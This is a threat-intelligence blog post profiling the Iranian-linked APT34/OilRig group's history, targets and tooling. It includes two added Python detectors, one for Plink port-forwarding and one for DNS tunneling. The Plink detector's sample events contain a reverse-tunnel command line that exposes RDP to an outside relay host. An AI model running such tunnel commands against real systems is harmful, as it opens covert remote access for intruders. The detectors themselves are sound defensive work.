This blog is the latest in a series that delves into the deep research conducted daily by the Trustwave SpiderLabs team on major threat actor groups currently operating globally.

APT34, also known as OilRig, Earth Simnavaz, and Helix Kitten, is a sophisticated, state-sponsored cyber threat group with suspected ties to Iran. Active since about 2012, the group has gained notoriety for targeting critical industries worldwide, including finance, energy, telecommunications, and government sectors, with a primary focus on the Middle East, according to a Trustwave SpiderLabs in-depth analysis of the group.

APT34: Origins and Ties to Iranian Cyber Operations

APT34 casts a very wide targeting net that includes the energy, financial, government, chemical, and telecommunications sectors, with a primary focus on the Middle East. The group was originally tracked as two separate entities, APT34 and OilRig, but it is believed the groups were consolidated due to overlapping activities observed in additional reporting. APT34 is believed by multiple entities, including MITRE, to operate on behalf of the Iranian government, leveraging that nation's infrastructure with a targeting scheme that aligns with Iranian state interests. The group often employs supply chain attacks, exploiting relationships between organizations to compromise its primary targets.

Recently, APT34 has intensified its attacks on critical infrastructure in the Middle East, signaling a continued emphasis on exploiting vulnerabilities in these geopolitically sensitive regions. This escalation highlights its strategic focus on disrupting and exploiting infrastructure frameworks within its operational sphere.

APT34's Affiliated Groups

APT34 is associated with a very large number of Iranian-centric malicious groups. These include Iran's Ministry of Intelligence and Security (MOIS). Unlike the Islamic Revolutionary Guard Corps, also known as the Iranian Revolutionary Guards, which is integral to military data collection and analysis, the MOIS operates under the civil executive branch.
However, APT34 also works with other Iranian government-affiliated activity clusters, including Karkoff, Saitama, and IIS Group2. These groups share overlapping characteristics such as common C2 mechanisms, malware, and attack methodologies. They are also connected through malicious IIS modules and other attack artifacts. Other related entities are Greenbug and Volatile Kitten, recognized as APT34's subgroups. The group has also been observed to overlap with APT33 (Elfin, Magnallium) and possibly, though without formal attribution, with campaigns like DNSpionage.

Further highlighting the interconnected nature of Iranian state-sponsored cyber operations, APT34's activities show similarities with the Hexane (aka Lyceum) cluster. Additionally, there is documented overlap between APT34 and FOX Kitten, another Iranian-linked group, which played a notable role in enabling ransomware attacks targeting organizations in the US and the Middle East. In August, CISA issued an alert on FOX Kitten's activities, emphasizing its ability to facilitate more destructive operations.

Key Sectors Targeted by APT34

In line with its need to align with Iranian objectives to enhance national security, geopolitical influence, and other strategic interests, APT34 focuses on intelligence collection and conducting cyber operations aimed at espionage. To this end, the group targets organizations worldwide to obtain sensitive and strategic information. This motivation aligns with state-sponsored objectives.

APT34's Target List

As previously noted, APT34 has not shied away from attacking a wide range of targets, striking the aviation, defense, education, IT, oil and gas, and telecommunications sectors, all to obtain information needed by the Iranian government. While the group primarily focuses its operations within the Middle East, the Persian Gulf region in particular, it also maintains a global footprint. This is accomplished through attacks on the United States, United Kingdom, China, Turkey, and various nations across the Middle East and North Africa.
This wide-ranging victimology underscores APT34's strategic objectives, focusing on sectors and regions that hold economic, geopolitical, or strategic value to its operations. The group's adaptability and expansive targeting reflect its role as a versatile and persistent threat actor in the global cyber landscape.

APT34's Targeting Timeline

2012

SpiderLabs believes the group has been operating since 2012, but APT34's first public appearance occurred in 2016, when Palo Alto Networks Unit 42 observed a wave of attacks by a threat actor targeting financial institutions and technology organizations within Saudi Arabia and possibly the defense industry. Unit 42 is credited with doing the majority of the work uncovering APT34 operations.

2016

This Saudi Arabian campaign employed social engineering techniques, such as impersonating legitimate service providers who offer troubleshooting assistance. The primary tool used in these attacks was the Helminth backdoor, delivered through Excel macros or as standalone executables. Unit 42 named this ongoing operation "OilRig", characterized by its use of highly targeted phishing campaigns. The attacks expanded beyond Saudi Arabia to include Qatar, Turkey, Israel, and even the US, as observed by Unit 42 in its follow-up analysis.

In May 2016, FireEye tracked the use of unique scripts in attacks against Middle Eastern banks, marking the beginning of this campaign's evolution toward more specialized tools and tactics. FireEye labeled the group APT34. Furthermore, the OilRig/APT34 actors updated their malware and tools. The changes included modifications to the Clayslide delivery documents and the Helminth backdoor to better evade antivirus detection and enhance operational sophistication.

2017

The group further improved its capabilities by adding a new Trojan called ISMAgent, a variant of the ISMDoor Trojan, and another tool, ISMInjector, specifically designed to deploy the ISMAgent backdoor.
These developments and the anti-analysis techniques incorporated into its tools signaled a ramping up of the group's cyber espionage activities and its efforts to remain undetected. These innovations were accompanied by several reports detailing the targeting of Israeli IT vendors, financial institutions, and even government entities in multiple Middle Eastern countries. Unit 42 also found a webshell that the threat actor used to remotely access the network of a targeted Middle Eastern organization. The webshell had two parts: an initial web shell responsible for saving and loading a second, fully functional webshell. This web shell was later attributed to OilRig. Then, less than a week after Microsoft issued a patch for CVE-2017-11882, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East.

2018

Unit 42 reported that OilRig had used a new Trojan, OopsIE, to attack a Middle Eastern insurance agency and a financial institution. These attacks leveraged the ThreeDollars delivery document, previously identified in 2017. Additionally, APT34 had begun using a new IIS backdoor named RGDoor, which was deployed on web servers of Middle Eastern government organizations. This increase in activity and tool variety suggested that APT34/OilRig was not only improving its existing infrastructure but was also targeting high-value governmental and financial organizations for information gathering. By mid-2018, Unit 42 uncovered an expanded scope of OilRig's activities, with the group reportedly using compromised accounts from a government agency as a launch point for further attacks. These developments indicated a highly organized and professional cyber espionage operation.

2019

At this time, significant leaks occurred in the group's operational security, and tools belonging to APT34 were shared on a Telegram channel by an individual using the pseudonym Lab Dookhtegan.
This leak, which included malware and victim data, revealed how APT34 had been retooling and updating its arsenal. Despite these leaks, the group continued to evolve its malware, developing new variants and updating older ones, as demonstrated by Cisco Talos's investigation into the group's new Karkoff implant. The same year, APT34 carried out a targeted phishing campaign, leveraging its new techniques and three additional malware families. FireEye detailed this phishing campaign, in which APT34 used LinkedIn and fake Cambridge University credentials to lure victims into opening malicious documents, further showcasing the group's skill and adaptability.

2020

The following year, researchers identified new activity when they uncovered that APT34 had tailored a campaign specifically targeting Westat, a U.S.-based company providing research services to various government agencies. The group also continued refining its use of Karkoff and RDAT malware, which was linked to a novel email-based C2 channel utilizing steganography to hide commands within bitmap images. This activity indicated that APT34 was becoming increasingly sophisticated as it modified its attack vectors to evade detection.

2021

Next, Check Point Research tracked a new APT34 campaign targeting Lebanese organizations, deploying a new backdoor variant called SideTwist. This activity suggested the threat group was not only still active but was continually updating its toolset. ESET researchers documented additional campaigns in 2021 and 2022, including "Outer Space" and "Juicy Mix", which were aimed at Israeli organizations. These campaigns continued to use OilRig's established tactics and tools but with additional updates to evade detection, further emphasizing the group's ongoing evolution.

2022

This year, APT34 targeted Jordan's foreign ministry in a spear-phishing campaign, utilizing a new backdoor named Saitama.
This attack involved spear-phishing emails containing malicious attachments to deliver APT34's payload. The group continued to employ advanced techniques, including DNS tunneling and stateful inspection, to maintain persistence and avoid detection. Then, in mid-July, APT34 did something unique: Microsoft attributed a wave of destructive ransomware and wiper attacks against the Albanian government to APT34. This remains the only sabotage-type campaign ever attributed to the group. The year ended with a credential-harvesting campaign against targets in the Middle East.

2023

OilRig/APT34 returned to its bread-and-butter operations. Starting in February, it staged an eight-month-long intrusion against undisclosed government entities in the Middle East. During this compromise, the attackers stole files and passwords and, in one instance, installed a PowerShell backdoor called PowerExchange. This backdoor was used to monitor incoming emails from an Exchange Server, execute commands sent by the attackers via email, and surreptitiously forward results back to the attackers. Evidence suggested the attackers deployed backdoors and keyloggers on dozens of additional machines. In addition to deploying malware, the attackers frequently used the publicly available network administration tool Plink to configure port-forwarding rules on compromised machines, enabling remote access via Remote Desktop Protocol (RDP).

In the following months, Check Point, in collaboration with Sygnia, tracked and responded to a new set of activities, assigning its own alias, Scarred Manticore, to APT34. In this instance, the group primarily targeted government and telecommunication sectors in the Middle East. Scarred Manticore continued to pursue high-profile organizations, leveraging access to systematically exfiltrate data using tailor-made tools. In several attacks, the threat actor leveraged the LIONTAIL framework, which is a set of custom loaders and memory-resident shellcode payloads.
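The Plink port-forwarding activity described in the 2023 intrusion above is one of the few behaviours in this timeline that leaves a clean host-level signal. The following detection logic is an added example, not code from the original post or from Trustwave SpiderLabs. It assumes Sysmon-style process-creation records with image, original_filename and cmdline fields (the schema is an assumption; map it to your own EDR), and it runs over constructed sample events rather than real telemetry. It matches Plink by its PE OriginalFileName as well as its on-disk name, so a renamed copy is still caught, and it raises severity when a -L or -R forward points at an interactive service such as RDP.

```python
import re

# Constructed Sysmon-style process-creation events (not real APT34 telemetry).
# Field names (image, original_filename, cmdline) are an assumed telemetry
# schema; adapt them to the EDR or Sysmon field mapping actually in use.
SAMPLE_EVENTS = [
    {"host": "WS-104", "image": r"C:\Windows\System32\svchost.exe",
     "original_filename": "svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"host": "SRV-WEB02", "image": r"C:\Users\Public\plink.exe",
     "original_filename": "Plink",
     "cmdline": r"C:\Users\Public\plink.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 -P 443 relay@203.0.113.10"},
    {"host": "WS-221", "image": r"C:\ProgramData\updater.exe",
     "original_filename": "Plink",
     "cmdline": r"C:\ProgramData\updater.exe -N -L 15432:10.0.0.40:5432 dev@198.51.100.7"},
    {"host": "ADM-01", "image": r"C:\Tools\plink.exe",
     "original_filename": "Plink",
     "cmdline": r"C:\Tools\plink.exe -N -L 15432:10.0.0.40:5432 dba@10.0.0.41"},
]

# Services whose exposure through a tunnel hands an intruder interactive or
# lateral-movement access; a forward to one of these raises the severity.
SENSITIVE_PORTS = {3389: "RDP", 445: "SMB", 5985: "WinRM", 5986: "WinRM", 22: "SSH"}
PLINK_NAMES = {"plink", "plink.exe"}
# Plink/ssh forward spec: [listen_addr:]listen_port:target_host:target_port
FORWARD_RE = re.compile(r"^(?:(?P<laddr>[^:]+):)?(?P<lport>\d+):(?P<thost>[^:]+):(?P<tport>\d+)$")


def image_basename(event):
    return event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_plink(event):
    """Match the on-disk name or the PE OriginalFileName, so renaming does not evade the rule."""
    return image_basename(event) in PLINK_NAMES or \
        event.get("original_filename", "").lower() in PLINK_NAMES


def parse_forwards(cmdline):
    """Extract (flag, listen_port, target_host, target_port) tuples from -L/-R arguments."""
    tokens = cmdline.split()
    forwards = []
    for i, tok in enumerate(tokens[:-1]):
        if tok in ("-L", "-R"):
            m = FORWARD_RE.match(tokens[i + 1])
            if m:
                forwards.append((tok, int(m["lport"]), m["thost"], int(m["tport"])))
    return forwards


def evaluate_event(event):
    """Return a finding for tunnelling-like Plink use, or None when the event is benign for this rule."""
    if not is_plink(event):
        return None
    forwards = parse_forwards(event["cmdline"])
    if not forwards:
        return None  # plain interactive SSH use is out of scope for this rule
    reasons = []
    severity = "medium"  # any port forward by Plink is worth a look
    if image_basename(event) not in PLINK_NAMES:
        severity = "high"
        reasons.append("Plink running under a renamed binary")
    for flag, lport, thost, tport in forwards:
        if tport in SENSITIVE_PORTS:
            severity = "high"
            reasons.append(f"{flag} forward exposes {SENSITIVE_PORTS[tport]} on {thost}:{tport}")
        if flag == "-R":
            reasons.append("reverse forward: listener opened on the remote SSH host")
    return {"host": event["host"], "severity": severity,
            "forwards": forwards, "reasons": reasons}


def scan(events):
    """Run the rule over a batch of events and keep only the hits."""
    return [f for f in (evaluate_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["host"], finding["severity"], "; ".join(finding["reasons"]))
```

The medium-severity hit on the administrator workstation shows why the rule reports rather than blocks: Plink forwards to a database port can be legitimate, so the value comes from tuning against a baseline of known administrative hosts and treating renamed binaries and forwards to RDP, SMB or WinRM as the cases that warrant immediate triage.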
LIONTAIL's implants utilized undocumented functionalities of the HTTP.sys driver to extract payloads from incoming HTTP traffic. Multiple observed variants of LIONTAIL-associated malware suggested that Scarred Manticore generates tailor-made implants for each compromised server, allowing the malicious activities to blend into and be indiscernible from legitimate network traffic. Also in 2023, APT34 unleashed a new wave of phishing attacks using a variant of the SideTwist Trojan. The phishing theme used a fake license registration form from an African government agency to target a victim in Saudi Arabia.

2024

Check Point Research discovered an elaborate cyberattack against Iraqi governmental networks. The installer used to deploy the malware bore the logo of the Iraqi General Secretariat of the Council of Ministers, while the domains of compromised servers were related to the Iraqi Prime Minister's Office and the Ministry of Foreign Affairs. Additionally, Trend Micro researchers have documented the group, under the Earth Simnavaz alias, actively targeting various undisclosed entities in the Middle East, deploying backdoors that leverage Microsoft Exchange servers for credential theft, and exploiting vulnerabilities like CVE-2024-30088 for privilege escalation. Earth Simnavaz employs a combination of customized .NET tools, PowerShell scripts, and IIS-based malware to allow its activity to blend in with normal network traffic and avoid traditional detection methods.

APT34's Tools and Techniques for Persistent Threats

APT34 utilizes a sophisticated and constantly evolving toolkit in its campaigns. It incorporates a range of custom-developed tools designed for stealth, persistence, and evasion. These tools, often tailored for specific target environments, allow the group to maintain operational flexibility while remaining undetected in highly secured networks.
Recent campaigns have demonstrated APT34's ability to exploit vulnerabilities such as CVE-2024-30088 for privilege escalation, enabling it to escalate its access within compromised networks. The group also leveraged Microsoft Exchange servers for credential theft, further enhancing its ability to move laterally within targeted environments. To blend its malicious activity with normal network traffic and avoid traditional detection methods, APT34 relies on a mix of customized .NET tools, PowerShell scripts, and IIS-based malware. The group crafts these tools to operate with minimal footprints, making them difficult for conventional security solutions to identify.

A key characteristic of APT34's operations is its use of specialized, continuously refined C2 mechanisms. One notable method is deploying a custom DNS tunneling protocol that allows the group to exfiltrate data and maintain control over compromised systems while bypassing traditional network monitoring solutions. Additionally, APT34 utilizes email-based C2 channels that leverage compromised accounts, further complicating detection efforts by blending its communications with legitimate activity.

Its toolkit also includes various other malware and tools that have been used in campaigns over the years. The group has an arsenal of weapons at its disposal. In addition to the recently used STEALHOOK exfiltration tool, the Veaty and Spearal malware families, and the presence of passive IIS backdoors and custom webshells, these include Alma Communicator, BONDUPDATER, certutil, Clayslide, DistTrack, DNSExfiltrator, DNSpionage, Dustman, Fox Pane, GoogleDrive RAT, and Helminth, among many others. The variety of tools reflects APT34's capability to conduct a wide range of cyber-espionage operations, from reconnaissance and lateral movement to exfiltration and destruction.
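DNS tunneling of the kind described above is hard to catch with signatures because each implant uses its own encoding, but the channel still has to push data through query names, and that leaves statistical traces. The detector below is an added example, not code from the original post or from Trustwave SpiderLabs, and it does not model any specific APT34 protocol. It runs over a constructed sample of resolver log lines (not real telemetry) and scores each registered domain on how many distinct, long, high-entropy first labels it receives, reporting the share of data-carrying record types alongside. The registered-domain split uses a naive last-two-labels rule, which is an assumption; a deployment should use the public suffix list.

```python
import math
from collections import defaultdict

# Constructed sample resolver log (not real APT34 telemetry).
# One query per line: "<timestamp> <client_ip> <qtype> <qname>"
SAMPLE_DNS_LOG = """\
2024-10-01T08:00:01Z 10.0.0.5 A www.example-corp.test
2024-10-01T08:00:02Z 10.0.0.5 A cdn.example-corp.test
2024-10-01T08:00:03Z 10.0.0.7 TXT 6a7f3e9b1c4d5e2f8a9b0c1d2e3f4a5b.updates.invalid-c2.test
2024-10-01T08:00:04Z 10.0.0.7 TXT 9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a4f.updates.invalid-c2.test
2024-10-01T08:00:05Z 10.0.0.7 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f0.updates.invalid-c2.test
2024-10-01T08:00:06Z 10.0.0.7 TXT f0e1d2c3b4a5968778695a4b3c2d1e0f.updates.invalid-c2.test
2024-10-01T08:00:07Z 10.0.0.5 A mail.example-corp.test
2024-10-01T08:00:08Z 10.0.0.9 A login.example-corp.test
"""

# Record types whose answers can carry arbitrary bytes back to the client and
# are therefore favoured by tunnelling tools; reported as a ratio per domain.
DATA_CARRYING_QTYPES = {"TXT", "NULL", "CNAME", "MX"}


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded or encrypted chunks sit close to the maximum for their alphabet."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (first_label, registered_domain).

    Naive last-two-labels rule for the registered domain (an assumption made
    for this example); production code should consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return labels[0], ".".join(labels[-2:])


def parse_line(line: str) -> dict:
    ts, client, qtype, qname = line.split()
    return {"ts": ts, "client": client, "qtype": qtype.upper(), "qname": qname}


def analyze_dns_log(log_text: str, min_unique: int = 3,
                    entropy_threshold: float = 3.5, min_label_len: int = 20) -> dict:
    """Aggregate queries per registered domain and flag tunnelling-like patterns.

    A domain is flagged when at least `min_unique` distinct first labels are
    both long and high-entropy. Query type is reported but not required,
    because tunnels that only carry data in the name (plain A lookups) exist."""
    per_domain = defaultdict(lambda: {"queries": 0, "labels": set(),
                                      "clients": set(), "data_qtypes": 0})
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        q = parse_line(raw)
        label, domain = split_name(q["qname"])
        d = per_domain[domain]
        d["queries"] += 1
        d["labels"].add(label)
        d["clients"].add(q["client"])
        if q["qtype"] in DATA_CARRYING_QTYPES:
            d["data_qtypes"] += 1

    results = {}
    for domain, d in per_domain.items():
        suspicious = [lbl for lbl in d["labels"]
                      if len(lbl) >= min_label_len and shannon_entropy(lbl) >= entropy_threshold]
        results[domain] = {
            "queries": d["queries"],
            "unique_labels": len(d["labels"]),
            "suspicious_labels": len(suspicious),
            "data_qtype_ratio": d["data_qtypes"] / d["queries"],
            "clients": sorted(d["clients"]),
            "flagged": len(suspicious) >= min_unique,
        }
    return results


def flagged_domains(log_text: str) -> list:
    """Sorted registered domains that crossed the tunnelling threshold."""
    return sorted(dom for dom, r in analyze_dns_log(log_text).items() if r["flagged"])


if __name__ == "__main__":
    for dom, r in analyze_dns_log(SAMPLE_DNS_LOG).items():
        print(f"{dom:22} flagged={r['flagged']} suspicious={r['suspicious_labels']} "
              f"data_qtype_ratio={r['data_qtype_ratio']:.2f} clients={r['clients']}")
```

The thresholds are deliberately conservative and still need a baseline: CDNs, anti-spam reputation lookups and some telemetry agents produce long random-looking labels legitimately, so the useful output is the per-domain summary (which internal clients, how many unique labels, what record types) that an analyst can compare against the organisation's normal DNS profile, not the boolean on its own.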
APT34's operational flexibility, combined with highly customized and modular toolsets, allows it to adapt quickly to evolving network defenses and continuously refine its techniques for maintaining long-term persistence in high-value targets. Overall, APT34's toolkit reflects a constantly evolving approach to cyber espionage, leveraging tools tailored for stealth, persistence, and evasion. At the same time, since 2016, APT34 has exhibited some patterns. Almost every year, the group introduces a new set of lightweight, custom-built .NET and PowerShell backdoors that are rarely reused.

APT34 shows us that these criminal groups do not stop evolving with new TTPs. All organizations, specifically those in the energy, government, and finance sectors, must adopt proactive security measures to counteract evolving threats like APT34. Strengthening vulnerability management and threat intelligence can mitigate the risks posed by this persistent threat actor.